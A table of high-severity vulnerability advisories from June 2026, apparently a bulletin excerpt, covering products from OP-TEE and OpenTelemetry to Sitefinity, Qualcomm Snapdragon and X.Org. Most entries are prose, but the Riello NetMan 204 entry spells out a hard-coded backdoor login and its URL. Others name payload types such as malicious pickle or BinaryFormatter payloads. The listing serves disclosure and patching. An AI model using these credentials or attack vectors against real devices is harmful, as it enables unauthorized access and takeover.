| OP-TEE--optee_os | OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-secure Linux kernel running on Arm; Cortex-A cores using the TrustZone technology. Starting in version 3.16.0 and prior to 4.11.0, a user-after-free (UAF) race condition exists in the shared memory teardown logic of FF-A within OP-TEE SPMC/SP flows. This only applies when OP-TEE is configured as an SPMC for S-EL0 SPs, that is, with `CFG_SECURE_PARTITION=y`. The function `sp_mem_remove()`, responsible for freeing entries in `smem->receivers` and `smem->regions`, fails to acquire the global `sp_mem_lock` before performing the `free()` operations. Concurrently, other code paths, such as `sp_mem_get_receiver()`, iterate over these same lists without holding a lock, or, like `sp_mem_is_shared()`, iterate while holding the lock but are not serialized against the unprotected `free()` in `sp_mem_remove()`. This creates a cross-thread race where a thread iterating the list can acquire a pointer to an entry (e.g., `struct sp_mem_map_region` or `struct sp_mem_receiver`), and then another thread calls `sp_mem_remove()`, freeing the object. When the first thread resumes and dereferences the pointer, it results in a Use-After-Free vulnerability. Version 4.11.0 fixes the issue. | 2026-06-03 | 7.8 | CVE-2026-40290 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, the Postgres protocol parser assumes BIND message payloads contain a valid NUL-terminated portal name. A crafted empty or unterminated payload can make OBI slice beyond the end of the captured buffer and panic. This issue has been patched in version 0.9.0. | 2026-06-02 | 7.5 | CVE-2026-45678 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. From version 0.1.0 to before version 0.9.0, malformed MongoDB wire messages can trigger uncaught panics in the MongoDB TCP parser, allowing a remote unauthenticated attacker to crash the telemetry agent and cause a denial of service. The parser operates on raw attacker-controlled network payloads before the input is fully validated, so a single crafted message can terminate telemetry collection for the affected process or node. This issue has been patched in version 0.9.0. | 2026-06-02 | 7.5 | CVE-2026-45685 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. From version 0.7.0 to before version 0.9.0, a remotely reachable integer overflow in OBI's memcached text protocol parser can crash the OBI process and cause denial of service. When parsing memcached storage commands such as set, add, replace, append, prepend, or cas, OBI accepts extremely large <bytes> values and adds the payload delimiter length without checking for overflow. A crafted request with <bytes> set to math.MaxInt or math.MaxInt-1 causes the computed payload length to wrap negative and triggers a runtime panic in LargeBufferReader.Peek. This issue has been patched in version 0.9.0. | 2026-06-02 | 7.5 | CVE-2026-45686 |
| OpenStack--Mistral | OpenStack Mistral through 22.0.0 allows Arbitrary Remote Code Execution when the API is exposed. There are endpoints that allow code execution, which can lead to exfiltration of service credentials. | 2026-06-04 | 9.9 | CVE-2026-41283 |
| Osnexus--QuantaStor | OSNexus QuantaStor SDS Manager is vulnerable to SQL injection in the login endpoint. The username field is not properly sanitized before being incorporated into a SQL query, allowing an unauthenticated remote attacker to bypass authentication and log in as an administrator without supplying a valid password. | 2026-06-04 | 9.8 | CVE-2026-10880 |
| OTRS AG--OTRS | An improper Input Validation vulnerability in OTRS or ((OTRS)) Community Edition database layer module allows an unauthenticated SQL injection which can lead to an authentication bypass. This issue only affects the system if the MySQL/MariaDB server is configured with the NO_BACKSLASH_ESCAPES SQL mode. This issue affects OTRS: * 7.0.X * 8.0.X * 2023.X * 2024.X * 2025.X * 2026.X before 2026.4.X * (OTRS)) Community Edition: 6.0.x Products based on the ((OTRS)) Community Edition also very likely to be affected | 2026-06-01 | 9.1 | CVE-2026-48188 |
| OTRS AG--OTRS | An improper neutralization of user-controllable input in OTRS or ((OTRS)) Community Edition ticket handling allows authenticated attackers to perform reflected cross-site scripting (XSS) attacks via crafted request parameters associated with ticket actions. By injecting malicious JavaScript into manipulated request URLs, attackers can execute arbitrary script code in the context of an authenticated agent session when the crafted link is opened. This issue affects OTRS: * 7.0.x Please note that ((OTRS)) Community Edition 6.x and before are vulnerable. Products based on the ((OTRS)) Community Edition also very likely to be affected | 2026-06-01 | 7.1 | CVE-2026-48209 |
| Paroiciel--Paroiciel | Paroiciel 11.20 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the tRecIdListe parameter. Attackers can send GET requests to the trec.php endpoint with crafted SQL payloads to extract database information including table and column names. | 2026-06-01 | 8.2 | CVE-2018-25428 |
| Paroiciel--Paroiciel | Paroiciel 11.20 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the zProIdPro parameter. Attackers can send GET requests to zpro.php with crafted SQL payloads in the zProIdPro parameter to extract sensitive database information including usernames, databases, and version details. | 2026-06-01 | 7.1 | CVE-2018-25429 |
| Paroiciel--Paroiciel | Paroiciel 11.20 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the eGeqIdEquipe parameter. Attackers can send GET requests to the egeq.php endpoint with crafted SQL payloads to extract sensitive database information including version details and other data. | 2026-06-01 | 7.1 | CVE-2018-25430 |
| perfree--go-fastdfs-web | A flaw has been found in perfree go-fastdfs-web up to 1.3.7. Affected is the function checkServer of the file /install/checkServer of the component Installation Endpoint. Executing a manipulation can lead to server-side request forgery. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 7.3 | CVE-2026-11437 |
| Phoenix Contact--CHARX SEC-3150 | It is possible for an unauthenticated adjacent attacker to download log files of the controller, which may disclose some restricted information. | 2026-06-03 | 7.5 | CVE-2026-41032 |
| php-censor--php-censor | A vulnerability was found in php-censor up to 2.1.6. This affects an unknown function of the file src/Model/Build/GitBuild.php of the component Webhook Endpoint. Performing a manipulation of the argument commitId results in os command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The patch is named cd68d102601320bd319d590b75f7652e66f0685f. It is recommended to apply a patch to fix this issue. | 2026-06-01 | 7.3 | CVE-2026-10273 |
| Pixastudio--Pixa Bank | Pixa Bank 2.0 contains an SQL injection vulnerability that allows unauthenticated attackers to extract sensitive data by injecting SQL code into the 'rib' parameter. Attackers can send POST requests to the agence-ajax.php endpoint with UNION-based SQL payloads to retrieve user information including names, email addresses, and phone numbers from the database. | 2026-06-01 | 8.2 | CVE-2026-49491 |
| plugcrux--Integration for Freshsales Contact Form 7, WPForms, Elementor, Gravity Forms and More | The Integration for Freshsales - Contact Form 7, WPForms, Elementor, Gravity Forms and More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Form Submission Data in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload only executes when a CRM API call fails for the submitted form and an administrator subsequently views the error log details modal in the WordPress admin panel. | 2026-06-06 | 7.2 | CVE-2026-8901 |
| Progress Software--LoadMaster | OS Command Injection Remote Code Execution Vulnerability in API in Progress ADC Products allows an un-authenticated attacker to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in multiple command endpoints | 2026-06-04 | 9.6 | CVE-2026-8037 |
| Progress Software--Sitefinity | CWE‑522: Insufficiently Protected Credentials in web services in Progress Sitefinity version from 14.0.7700 to 14.4.8152, and 15.0.8200 to 15.0.8234, and 15.1.8300 to 15.1.8335, 15.2.8400 to 15.2.8441, 15.3.8500 to 15.3.8531, and 15.4.8600 to 15.4.8630 allows a remote unauthenticated attacker to obtain plain-text credentials used connect to Sitefinity Insight service. Successful exploitation requires active integration with Sitefinity Insight and non-default site configuration. | 2026-06-02 | 10 | CVE-2026-7312 |
| Progress Software--Sitefinity | CWE-284: Improper Access Control in web services in Progress Sitefinity 15.4.8623 before 15.4.8630 allows a remote unauthenticated attacker to access content that should be restricted, resulting in full compromise of confidentiality, integrity, and availability of affected installations. | 2026-06-02 | 9.8 | CVE-2026-7198 |
| Progress Software--Sitefinity | CWE-20: Improper Input Validation in web services in Progress Sitefinity 14.1.x through 14.3.x, 14.4.x before 14.4.8152, 15.0.x before 15.0.8234, 15.1.x before 15.1.8335, 15.2.x before 15.2.8441, 15.3.x before 15.3.8531, and 15.4.x before 15.4.8630 allows a remote unauthenticated attacker to compromise the integrity and confidentiality of user accounts. Successful exploitation requires user interaction and a non-default site configuration. | 2026-06-02 | 8.8 | CVE-2026-7195 |
| Progress Software--Sitefinity | CWE-639: Authorization Bypass Through User-Controlled Key in web services in Progress Sitefinity 15.2.x before 15.2.8441, 15.3.x before 15.3.8531, and 15.4.x before 15.4.8630 allows a remote authenticated attacker to modify account properties of other users, potentially leading to account compromise. Successful exploitation requires knowledge of values that are not generally exposed to low-privileged users. | 2026-06-02 | 8.8 | CVE-2026-7201 |
| Progress Software--Sitefinity | CWE‑522: Insufficiently Protected Credentials in web services in Progress Sitefinity version from 8.0.5700 to 13.3.7652 allows a remote authenticated attacker to obtain plain-text credentials used connect to Sitefinity Insight service. Successful exploitation requires active integration with Sitefinity Insight, non-default site configuration and valid back-end authorization. | 2026-06-02 | 8.7 | CVE-2026-7313 |
| Qualcomm, Inc.--Snapdragon | Cryptographic Issue while processing a specific partition which allows unauthorized write access to load a customized bootloader. | 2026-06-01 | 8.2 | CVE-2026-24088 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while using Strongbox due to missing bounds check. | 2026-06-01 | 8.8 | CVE-2026-25276 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while using Strongbox due to buffer overflow. | 2026-06-01 | 8.8 | CVE-2026-25277 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when running a memory copy operation due to invalid writes caused by a null pointer. | 2026-06-01 | 7.8 | CVE-2025-59604 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing device identifier strings that exceed the expected maximum length. | 2026-06-01 | 7.8 | CVE-2025-59605 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when writing to invalid memory locations occurs due to heap memory exhaustion during secure data initialization. | 2026-06-01 | 7.8 | CVE-2025-59606 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing display command line information due to improper initialization of a variable. | 2026-06-01 | 7.2 | CVE-2026-24085 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing fastboot OEM commands. | 2026-06-01 | 7.2 | CVE-2026-24087 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing fastboot commands with invalid input. | 2026-06-01 | 7.2 | CVE-2026-24089 |
| Qualcomm, Inc.--Snapdragon | Cryptographic issue while processing partition table entries allows unauthorized modification of boot flow. | 2026-06-01 | 7.1 | CVE-2026-24090 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing fastboot commands with improperly formatted input. | 2026-06-01 | 7.2 | CVE-2026-24091 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing fastboot commands to set display mode. | 2026-06-01 | 7.2 | CVE-2026-24092 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing IOCTL calls for escape operations. | 2026-06-01 | 7.8 | CVE-2026-25258 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing multiple IOCTL command for escape operations. | 2026-06-01 | 7.8 | CVE-2026-25259 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing shared buffers without validation of concurrent user-mode input modifications. | 2026-06-01 | 7.8 | CVE-2026-25260 |
| raisulislamg4--student_management_system_by_php | A vulnerability was detected in raisulislamg4 student_management_system_by_php up to 310d950e09013d5133c6b9210aff9444382d16d1. This issue affects some unknown processing of the file login_check.php of the component Login. Performing a manipulation of the argument Username results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 7.3 | CVE-2026-10225 |
| raisulislamg4--student_management_system_by_php | A flaw has been found in raisulislamg4 student_management_system_by_php up to 310d950e09013d5133c6b9210aff9444382d16d1. Impacted is an unknown function of the file delete.php. Executing a manipulation of the argument user_id/course_id/teacher_id/student_id/application_id can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 7.3 | CVE-2026-10226 |
| raisulislamg4--student_management_system_by_php | A vulnerability has been found in raisulislamg4 student_management_system_by_php up to 310d950e09013d5133c6b9210aff9444382d16d1. The affected element is an unknown function of the file add_user_check.php of the component User Creation Handler. The manipulation of the argument role leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 7.3 | CVE-2026-10227 |
| Red Hat--Builds for Red Hat OpenShift | A flaw was found in the OpenShift Pipelines operator. The tekton-scheduler-rolebinding ClusterRoleBinding grants the system:authenticated group write access to Kueue and cert-manager custom resources via the tekton-scheduler-role ClusterRole. When Kueue or cert-manager CRDs are present on the cluster, any authenticated user can disrupt workload scheduling, tamper with scheduling priorities, delete other tenants' Workload objects, or induce cert-manager to overwrite TLS Secrets including the default ingress controller certificate. | 2026-06-04 | 9.6 | CVE-2026-10840 |
| Red Hat--Red Hat Ansible Automation Platform 2 | A flaw was found in ansible-core. The ansible-galaxy role install command processes dependency specifications from a role's meta/requirements.yml file. Due to improper neutralization of argument delimiters, a malicious role author can inject arbitrary git configuration flags through the src field. This allows arbitrary code execution on the machine of a user who installs the role via ansible-galaxy role install. | 2026-06-05 | 7.8 | CVE-2026-11332 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Poppler's Splash backend. A remote attacker could exploit this vulnerability by crafting a malicious PDF file that, when rendered, triggers an integer overflow in the `tilingPatternFill` function. This overflow leads to an undersized heap memory allocation, allowing a subsequent out-of-bounds write. Successful exploitation could result in arbitrary code execution, information disclosure, or denial of service within the context of the application processing the PDF. | 2026-06-01 | 7.8 | CVE-2026-10118 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in rrdcached, a component of rrdtool. A local attacker with access to a rrdcached socket can exploit a stack-based buffer overflow by sending an oversized CREATE request. This vulnerability can lead to a denial of service by crashing the daemon or potentially allow for arbitrary code execution, impacting the integrity and confidentiality of data. | 2026-06-01 | 7.8 | CVE-2026-43958 |
| Red Hat--Red Hat Enterprise Linux 10 | A stack-based buffer overflow flaw was found in the X.Org X server and Xwayland. A mismatch between the X server and the libXfont2 library's maximum font name length can cause a stack buffer overflow during font alias resolution. The server allocates a 256 byte stack buffer but libXfont2's alias target name length is 1024 bytes. A font alias name between 257 and 1023 bytes causes the X server to copy that name into the undersized stack buffer without further checks. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50256 |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free flaw was found in the X.Org X server and Xwayland in miSyncDestroyFence(). A client that sets up multiple fence triggers can trigger a use-after-free function pointer call. An attacker would connect to the X server to set up a fence and await that fence, then a second X connection destroys the fence, causing the use-after-free. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50257 |
| Red Hat--Red Hat Enterprise Linux 10 | A stack-based buffer overflow flaw was found in the X.Org X server and Xwayland. The X server has multiple stack buffers sized XkbMaxShiftLevel * XkbNumKbdGroups but CheckKeyTypes() does not verify or clamp non-canonical key types to XkbMaxShiftLevel. A client can change key types to excessive shift levels and trigger stack overflows. This is caused by an incomplete fix of CVE-2025-26597. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50258 |
| Red Hat--Red Hat Enterprise Linux 10 | A stack-based buffer overflow flaw was found in the X.Org X server and Xwayland. _XkbSetMapChecks() declares a fixed-size stack buffer mapWidths[256] indexed by key type index. The helper function CheckKeyTypes() writes to this buffer at a client-controlled offset, allowing a stack buffer overflow. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50259 |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free flaw was found in the X.Org X server and Xwayland in FreeCounter(). A client that sets up multiple SyncCounters and awaits on those triggers can trigger a use-after-free when destroying those counters via a second client connection. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50260 |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free flaw was found in the X.Org X server and Xwayland in SyncChangeCounter(). A client that sets up multiple SyncCounters can trigger a use-after-free when destroying those counters via a second client connection while changing those counters. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50261 |
| Red Hat--Red Hat Enterprise Linux 10 | An out-of-bounds write flaw was found in the X.Org X server and Xwayland in DRIGetBuffers/DRIGetBuffersWithFormat. A client that requests multiple DRI2BufferBackLeft attachments and one DRI2BufferFrontLeft can trigger an out-of-bounds heap write. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50264 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libinput. A local attacker with access to /dev/uinput can inject arbitrary udev properties through the libinput-device-group helper. This injection can lead to root code execution, for example, by exploiting REMOVE_CMD properties that are executed when a device is removed. This vulnerability allows an attacker to gain elevated privileges on the system. | 2026-06-05 | 7 | CVE-2026-50265 |
| Red Hat--Red Hat OpenShift Container Platform 4 | The Route OpenShift resource allows to define routes to make pods reachable at a subdomain through HAProxy. It was found that the checks performed on the spec.path YAML stanza in a Route document was insufficient and could allow a controlled injection of the HAProxy configuration. | 2026-06-02 | 8.8 | CVE-2026-1784 |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in the OpenShift Cloud Credential Operator Mint-mode IAM policies for AWS. Operator credentials are provisioned with account-wide scope for destructive actions rather than being restricted to cluster-owned resources, enabling cross-scope impact after credential compromise. | 2026-06-04 | 7.2 | CVE-2026-10843 |
| remix-run--react-router | React Router is a router for React. In versions 7.7.0 through 7.13.1, when using React Router's unstable React Server Components (RSC) APIs, there is a potential client-side Cross-Site Scripting (XSS) vulnerability in the RSC redirect handling if redirects come from untrusted sources. This does not impact applications that are not using the unstable RSC APIs in React Router. This is patched in version 7.13.2. | 2026-06-02 | 8 | CVE-2026-33245 |
| remix-run--react-router | React Router is a router for React. In versions 7.0.0 through 7.14.1, when using Framework Mode, a combination of steps could potentially allow unauthorized remote code execution (RCE) through external requests. This attack requires the application code to have an existing prototype pollution vulnerability, which can then be leveraged in a 2-step attack where the second step triggers unauthorized RCE on the remote server. This does not impact applications using Declarative Mode (`<BrowserRouter>`) or Data Mode (`createBrowserRouter/<RouterProvider>`). This is patched in version 7.14.2. | 2026-06-02 | 8.1 | CVE-2026-42211 |
| remix-run--react-router | React Router is a router for React. In versions 7.7.0 through 7.13.1, when using React Router's unstable React Server Components (RSC) APIs, there is a potential client-side Cross-Site Scripting (XSS) vulnerability in the RSC redirect handling if redirects come from untrusted sources. This does not impact applications that are not using the unstable RSC APIs in React Router. This is patched in version 7.13.2. | 2026-06-02 | 7.5 | CVE-2026-34077 |
| remix-run--react-router | React Router is a router for React. In versions 7.0.0 through 7.14.x of react-router and versions 2.10.0 through 2.17.4 of @remix-run/server-runtime, certain crafted requests can consume disproportionate server resources via unbounded path expansion in the __manifest endpoint, resulting in response time degradation and/or service unavailability for end users. This affects React Router Framework Mode applications as well as Remix applications. This does not impact applications using Declarative Mode (`<BrowserRouter>`) or Data Mode (`createBrowserRouter/<RouterProvider>`). This is patched in react-router version 7.15.0 and @remix-run/server-runtime version 2.17.5. | 2026-06-02 | 7.5 | CVE-2026-42342 |
| Riello UPS--NetMan 204 | NetMan 204 contains a hard-coded backdoor account with the username and password 'eurek' that grants administrative access. A remote, unauthenticated attacker can authenticate through the cgi-bin/login.cgi endpoint (for example /cgi-bin/login.cgi?username=eurek&password=eurek, which due to lax parameter validation can be shortened to /cgi-bin/login.cgi?username=eurek%20eurek) to obtain administrator privileges, allowing them to alter device configuration, enable the telnet/SSH services, and reset local user credentials. | 2026-06-05 | 9.8 | CVE-2025-71317 |
| Riello UPS--NetMan 204 | NetMan 204 fails to enforce authentication on its administrative pages and command endpoints. A remote, unauthenticated attacker can directly request administrative pages (such as administration.html, administration-commands.html, and configuration.html) to disclose sensitive information including LDAP configuration and active user details, and can invoke privileged UPS control commands - including shutdown, reboot, switch-on-bypass, and battery test - without supplying any credentials. | 2026-06-05 | 9.8 | CVE-2025-71318 |
| Rocketgenius Inc.--Gravity Forms | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Rocketgenius Inc. Gravity Forms allows Path Traversal. This issue affects Gravity Forms: from n/a through 2.10.0.1. | 2026-06-01 | 9.6 | CVE-2026-48866 |
| ROCm--aiter | AI Tensor Engine for ROCm (AITER) through 0.1.14 contains an unauthenticated remote code execution vulnerability in the MessageQueue.recv() function within shm_broadcast.py that allows unauthenticated remote attackers to execute arbitrary code by sending a malicious pickle payload to a ZMQ SUB socket with no authentication, HMAC, or format validation. Attackers who can reach the writer XPUB endpoint on the cluster network or supply a forged Handle with an attacker-controlled remote_subscribe_addr can deliver a crafted pickle payload that executes arbitrary code simultaneously as the inference worker process on every remote reader worker. | 2026-06-01 | 8.1 | CVE-2026-49121 |
| rxi--microtar | microtar through 0.1.0 contains a stack-based buffer overflow vulnerability in the raw_to_header() function in src/microtar.c that allows attackers to corrupt adjacent stack memory by supplying a crafted TAR archive with non-null-terminated name or linkname fields. The function uses strcpy() to copy 100-byte ustar format fields that lack null terminators, causing writes of up to 355 bytes into a 100-byte destination buffer when mtar_open(), mtar_find(), or mtar_read_header() process attacker-supplied TAR archives. | 2026-06-01 | 8.8 | CVE-2026-43623 |
| sayan365--student-management-system | A vulnerability was detected in sayan365 student-management-system up to 7f3c9ce7d410332335c2affac93a385485051800. This impacts an unknown function. The manipulation results in improper authentication. The attack can be executed remotely. The exploit is now public and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 7.3 | CVE-2026-10619 |
| Screets--Live Chat Unlimited | Live Chat Unlimited 2.8.3 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the chat input field. Attackers can submit payloads containing script tags and event handlers that execute in the admin area, enabling cookie theft or forced redirects to malicious websites. | 2026-06-04 | 7.2 | CVE-2019-25737 |
| Seagull Software, LLC.--BarTender 2010 | Seagull Software BarTender 2010, 2016, and 2019 contain an unauthenticated remote code execution vulnerability in the .NET Remoting service exposed on TCP port 7375 via BtSystem.Service.exe. The service registers an unauthenticated singleton endpoint - BarTenderSystem for BarTender 2016 <= R9, and DataServiceSingleton for BarTender 2019 <= R10 - configured with BinaryServerFormatterSinkProvider and TypeFilterLevel set to Full. An unauthenticated remote attacker can exploit .NET Remoting object unmarshalling to read or write arbitrary files on the server using the .NET WebClient class, or coerce NTLMv2 authentication by supplying a UNC path to an attacker-controlled server, enabling sensitive credential disclosure, remote code execution, or lateral movement depending on service account privileges and network environment. The service runs in the context of NT AUTHORITY\SYSTEM. | 2026-06-04 | 9.8 | CVE-2026-25550 |
| Seagull Software, LLC.--BarTender 2021 | Seagull Software BarTender 2021 R1 through 12.0.1 contains an insecure deserialization vulnerability that allows low-privileged local users to escalate privileges. The DataServiceSingleton .NET Remoting endpoint is bound to localhost on TCP port 7375 via BtSystem.Service.exe, limiting the attack surface to local access only. The endpoint is configured with BinaryServerFormatterSinkProvider and TypeFilterLevel set to Full. A low-privileged local attacker can send YSoSerial.NET-generated BinaryFormatter payloads to the localhost-bound endpoint to achieve code execution as NT AUTHORITY\\SYSTEM. | 2026-06-04 | 7.8 | CVE-2026-25551 |
| Select-Themes--WaveRide | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes WaveRide allows PHP Local File Inclusion. This issue affects WaveRide: from n/a through 1.4. | 2026-06-02 | 8.1 | CVE-2026-39553 |
| Sergey--AIWU | Incorrect Privilege Assignment vulnerability in Sergey AIWU allows Privilege Escalation. This issue affects AIWU: from n/a through 1.4.17. | 2026-06-01 | 9.8 | CVE-2026-48879 |
| ShapedPlugin, LLC--Product Slider Pro for WooCommerce | Improper Validation of Specified Quantity in Input vulnerability in ShapedPlugin, LLC Product Slider Pro for WooCommerce allows Malicious Software Implanted. This issue affects Product Slider Pro for WooCommerce: from n/a before 3.5.3. No patched version is available - the vendor has applied a fix to an existing release without publishing a new version. While the patch provided by the vendor is valid, releasing it under the existing version number leaves users unable to reliably determine whether they are running a patched or vulnerable installation. As a result, we treat this as an unpatched version. | 2026-06-05 | 10 | CVE-2026-49777 |
| shd101wyy--Markdown Preview Enhanced | Markdown Preview Enhanced before 0.8.28 opens external files and links from the preview through a shell and does not validate untrusted inputs taken from the markdown document - the diagram filename attribute, imported file paths, and the latex_engine code-chunk attribute. On Windows, a crafted markdown document can inject operating system commands that execute when the document is previewed. Fixed in 0.8.28 by passing these inputs as literal arguments instead of through a shell and validating them before use. | 2026-06-05 | 8.8 | CVE-2026-49492 |
| shd101wyy--Markdown Preview Enhanced | Markdown Preview Enhanced before 0.8.28 parses Bitfield fenced code blocks with interpretJS(), which evaluates the block content as code via vm.runInNewContext(), allowing arbitrary code execution. A crafted markdown document containing a malicious bitfield code block executes attacker-controlled code on the server side when the document is rendered or exported. Fixed in 0.8.28 by parsing bitfield register definitions with JSON5.parse(), since they are purely data. | 2026-06-05 | 8.8 | CVE-2026-49493 |
| shd101wyy--Markdown Preview Enhanced | Markdown Preview Enhanced before 0.8.28 parses WaveDrom diagrams by evaluating untrusted markdown content with eval(), allowing arbitrary JavaScript execution. The flaw affects every render path - the live preview (window.eval) and presentation mode plus HTML export (the bundled WaveDrom.ProcessAll()/eva() helpers) - and can also be triggered through a <script type="WaveDrom"> element injected via raw HTML in markdown. When a victim previews or exports a crafted markdown document, an attacker can execute arbitrary code, leading to arbitrary file write. Fixed in 0.8.28 by parsing with JSON5.parse() and sanitizing WaveDrom data scripts to inert strict JSON. | 2026-06-05 | 8.8 | CVE-2026-50733 |
| shd101wyy--Markdown Preview Enhanced | Markdown Preview Enhanced 0.8.x with crossnote engine 0.9.28 contains a code injection vulnerability in the WaveDrom rendering pipeline that allows attackers to execute arbitrary JavaScript by embedding malicious content in a wavedrom fenced code block within a crafted Markdown document. Attackers can exploit the unsanitized passing of wavedrom block content to window.eval() in the VS Code webview context to abuse the extension's message passing and invoke arbitrary file writes on the local filesystem. | 2026-06-05 | 7.1 | CVE-2026-11422 |
| Shibby--Tomato | A flaw has been found in Shibby Tomato 1.28.0000. This affects the function start_dhcpc of the file /sbin/rc of the component Web UI. This manipulation causes os command injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. This project is superseded by FreshTomato. | 2026-06-04 | 7.2 | CVE-2026-10870 |
| Shibby--Tomato | A vulnerability has been found in Shibby Tomato 1.28.0000. This vulnerability affects the function start_6rd_tunnel of the file /sbin/rc of the component Web UI. Such manipulation of the argument ipv6_6rd_borderrelay leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This project is superseded by FreshTomato. | 2026-06-04 | 7.2 | CVE-2026-10871 |
| Shibby--Tomato | A vulnerability was found in Shibby Tomato 1.28.0000. This issue affects the function start_vpnserver of the file /sbin/rc of the component Web UI. Performing a manipulation results in os command injection. The attack can be initiated remotely. The exploit has been made public and could be used. This project is superseded by FreshTomato. | 2026-06-04 | 7.2 | CVE-2026-10872 |
| Shibby--Tomato | A vulnerability was determined in Shibby Tomato 1.28.0000. Impacted is the function rstats_path of the file /bin/rstats of the component Web UI. Executing a manipulation can lead to os command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This project is superseded by FreshTomato. | 2026-06-04 | 7.2 | CVE-2026-10873 |
| simcy_creative--PDF Signer | PDF Signer 3.0 contains a server-side template injection vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting PHP commands through the CSRF-TOKEN cookie parameter. Attackers can craft malicious cookie values containing template injection payloads like shell_exec() to execute system commands and retrieve sensitive information from the server. | 2026-06-04 | 9.8 | CVE-2019-25729 |
| smartypants--SP Project & Document Manager | The SP Project & Document Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the view_file function in all versions up to, and including, 4.71. This makes it possible for unauthenticated attackers to read file metadata and obtain download links for arbitrary files stored inside project folders on the server, which can contain sensitive information. The authorization gate uses a negated nonce check OR-chained with permission checks, meaning a missing or invalid nonce causes the entire condition to evaluate to true and bypass all preceding capability and ownership checks. The secondary fallback check only denies access for root-level files (pid == 0), leaving all files stored inside project folders fully exposed to unauthenticated users who supply only a valid file ID in a POST request to admin-ajax.php. | 2026-06-04 | 7.5 | CVE-2026-10737 |
| SMCI--AS-2115HS-TNR | There is a vulnerability in the Supermicro BMC SMTP service at Supermicro AS-2115HS-TNR. An attacker may obtain administrator privileges and inject specially crafted characters into the SMTP service configuration. This may cause the underlying system to execute unintended commands during process invocation. Potential impact includes denial-of-service attacks, arbitrary code execution, or permanent compromise of the controller. | 2026-06-04 | 7.2 | CVE-2026-3820 |
| SolarWinds--Serv-U | SolarWinds Serv-U is susceptible to specially crafted POST requests that crash the Serv-U service without authentication using Content-Encoding: deflate. Mitigation steps are provided to secure customer environments in the SolarWinds Trust Center if you are unable to deploy the update | 2026-06-04 | 7.5 | CVE-2026-28318 |
| SolarWinds--Web Help Desk | SolarWinds Web Help Desk is found to be affected by a denial-of-service vulnerability, which when exploited, could cause the Web Help Desk server to crash due to insufficient memory. | 2026-06-02 | 8.2 | CVE-2026-28299 |
